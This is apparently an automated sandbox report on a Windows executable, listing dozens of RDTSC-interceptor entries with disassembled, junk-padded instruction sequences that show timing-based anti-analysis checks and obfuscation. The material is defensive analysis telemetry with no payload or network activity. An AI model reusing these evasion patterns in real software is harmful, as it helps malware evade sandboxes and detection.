Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0151 second address: 52C01E0 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F2F08D1BEB7h 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov esi, 257A4C9Bh 0x00000014 call 00007F2F08D1BEB0h 0x00000019 call 00007F2F08D1BEB2h 0x0000001e pop esi 0x0000001f pop edx 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov cx, dx 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 mov bx, ax 0x0000002c pushfd 0x0000002d jmp 00007F2F08D1BEAEh 0x00000032 and ah, FFFFFFF8h 0x00000035 jmp 00007F2F08D1BEABh 0x0000003a popfd 0x0000003b popad 0x0000003c mov ebx, dword ptr [ebp+10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2F08D1BEB5h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C01E0 second address: 52C01E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C01E6 second address: 52C01EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C01EA second address: 52C0223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F2F08CCF074h 0x0000000e mov dword ptr [esp], esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2F08CCF077h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0223 second address: 52C0287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2F08D1BEACh 0x00000013 adc si, 3678h 0x00000018 jmp 00007F2F08D1BEABh 0x0000001d popfd 0x0000001e mov bh, cl 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 mov esi, 43B0B7FDh 0x00000028 mov eax, 0655D6F9h 0x0000002d popad 0x0000002e mov dword ptr [esp], edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F2F08D1BEAEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0287 second address: 52C0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0296 second address: 52C029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C029C second address: 52C02A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C02A0 second address: 52C02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b push esi 0x0000000c movsx edi, ax 0x0000000f pop eax 0x00000010 popad 0x00000011 je 00007F2F7ACFA20Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2F08D1BEAAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C02C3 second address: 52C02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C02C9 second address: 52C0317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 jmp 00007F2F08D1BEAFh 0x00000015 popad 0x00000016 je 00007F2F7ACFA1E8h 0x0000001c pushad 0x0000001d mov ecx, 5B640237h 0x00000022 mov di, cx 0x00000025 popad 0x00000026 mov edx, dword ptr [esi+44h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007F2F08D1BEB7h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0317 second address: 52C0346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2F08CCF06Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0346 second address: 52C0356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08D1BEACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0356 second address: 52C0381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2F08CCF070h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0381 second address: 52C0387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0387 second address: 52C03A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F2F7ACAD355h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C03A5 second address: 52C03AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C03AB second address: 52C03E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2F08CCF077h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C03E0 second address: 52C03E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C03E6 second address: 52C03EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C03EA second address: 52C0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2F7ACFA155h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2F08D1BEB9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C0415 second address: 52C041B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52C041B second address: 52C0437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08D1BEAAh 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test bl, 00000007h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 mov cx, bx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0A53 second address: 52E0A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0A59 second address: 52E0AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F2F08D1BEB4h 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F2F08D1BEB7h 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F2F08D1BEB0h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0AB0 second address: 52E0AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0AB4 second address: 52E0ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0ABA second address: 52E0B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F2F08CCF070h 0x00000010 and esp, FFFFFFF8h 0x00000013 pushad 0x00000014 mov dl, al 0x00000016 pushfd 0x00000017 jmp 00007F2F08CCF073h 0x0000001c add cx, 751Eh 0x00000021 jmp 00007F2F08CCF079h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F2F08CCF078h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0B35 second address: 52E0B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0B3B second address: 52E0B82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08CCF06Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 pushfd 0x00000013 jmp 00007F2F08CCF06Fh 0x00000018 sub ch, 0000003Eh 0x0000001b jmp 00007F2F08CCF079h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0B82 second address: 52E0BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F2F08D1BEAEh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushad 0x00000012 mov cx, 6A03h 0x00000016 push esi 0x00000017 pop edi 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007F2F08D1BEB4h 0x0000001f jmp 00007F2F08D1BEB5h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007F2F08D1BEB1h 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov dx, 2ABEh 0x00000034 movsx edx, si 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0BFA second address: 52E0C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0C00 second address: 52E0C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0C04 second address: 52E0C74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2F08CCF06Bh 0x00000017 sub ah, FFFFFFCEh 0x0000001a jmp 00007F2F08CCF079h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F2F08CCF070h 0x00000026 jmp 00007F2F08CCF075h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0C74 second address: 52E0C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0C7A second address: 52E0C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0C7E second address: 52E0D0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F2F08D1BEAFh 0x00000012 test esi, esi 0x00000014 pushad 0x00000015 push esi 0x00000016 mov ebx, 7DD6D3C6h 0x0000001b pop ebx 0x0000001c mov di, si 0x0000001f popad 0x00000020 je 00007F2F7ACD157Eh 0x00000026 jmp 00007F2F08D1BEB6h 0x0000002b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 call 00007F2F08D1BEB6h 0x0000003c mov di, si 0x0000003f pop esi 0x00000040 popad 0x00000041 mov ecx, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F2F08D1BEAFh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0D0E second address: 52E0D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0D14 second address: 52E0D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0D1A second address: 52E0D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0D1E second address: 52E0D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0D22 second address: 52E0DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2F7AC846DFh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F2F08CCF074h 0x00000015 or cx, 0388h 0x0000001a jmp 00007F2F08CCF06Bh 0x0000001f popfd 0x00000020 popad 0x00000021 test byte ptr [77326968h], 00000002h 0x00000028 pushad 0x00000029 push eax 0x0000002a mov cx, bx 0x0000002d pop ebx 0x0000002e pushad 0x0000002f jmp 00007F2F08CCF06Ah 0x00000034 pushfd 0x00000035 jmp 00007F2F08CCF072h 0x0000003a or ecx, 4C0E9918h 0x00000040 jmp 00007F2F08CCF06Bh 0x00000045 popfd 0x00000046 popad 0x00000047 popad 0x00000048 jne 00007F2F7AC84685h 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0DA3 second address: 52E0DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0DA7 second address: 52E0DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0DAD second address: 52E0DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop esi 0x00000011 mov bx, 6EBCh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0DC8 second address: 52E0DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08CCF071h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0DDD second address: 52E0E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F2F08D1BEAEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2F08D1BEAEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0E14 second address: 52E0ED5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 pushfd 0x00000006 jmp 00007F2F08CCF06Ah 0x0000000b jmp 00007F2F08CCF075h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F2F08CCF06Ch 0x0000001c add eax, 62E30CF8h 0x00000022 jmp 00007F2F08CCF06Bh 0x00000027 popfd 0x00000028 jmp 00007F2F08CCF078h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 jmp 00007F2F08CCF06Eh 0x00000035 movzx esi, di 0x00000038 popad 0x00000039 push eax 0x0000003a jmp 00007F2F08CCF06Ch 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F2F08CCF070h 0x00000045 push dword ptr [ebp+14h] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F2F08CCF06Dh 0x00000051 or ah, 00000056h 0x00000054 jmp 00007F2F08CCF071h 0x00000059 popfd 0x0000005a mov ch, C1h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0007 second address: 52E000D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E000D second address: 52E0012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0012 second address: 52E0063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2F08D1BEAEh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F2F08D1BEABh 0x0000000f sbb ecx, 5FA3DC2Eh 0x00000015 jmp 00007F2F08D1BEB9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2F08D1BEADh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E0063 second address: 52E00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 38F2h 0x00000007 jmp 00007F2F08CCF073h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2F08CCF06Fh 0x00000017 sub si, 679Eh 0x0000001c jmp 00007F2F08CCF079h 0x00000021 popfd 0x00000022 push esi 0x00000023 mov cl, dl 0x00000025 pop ecx 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 movsx ebx, ax 0x0000002c push eax 0x0000002d push edx 0x0000002e movzx esi, dx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E00C0 second address: 52E00E7 instructions: 0x00000000 rdtsc 0x00000002 call 00007F2F08D1BEB9h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E00E7 second address: 52E00FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52E00FF second address: 52E0106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 52D0D9A second address: 52D0DA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350BDB second address: 5350BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350BDF second address: 5350BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350BE5 second address: 5350C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2F08D1BEACh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2F08D1BEADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C0A second address: 5350C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C10 second address: 5350C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C14 second address: 5350C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C18 second address: 5350C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F2F08D1BEAFh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2F08D1BEB0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C46 second address: 5350C55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C55 second address: 5350C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08D1BEB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5350C6D second address: 5350C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340DF3 second address: 5340DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340DF9 second address: 5340DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340DFD second address: 5340E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E01 second address: 5340E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F2F08CCF06Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2F08CCF06Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E26 second address: 5340E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E2A second address: 5340E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E30 second address: 5340E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2F08D1BEB3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: 5340E47 second address: 5340E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
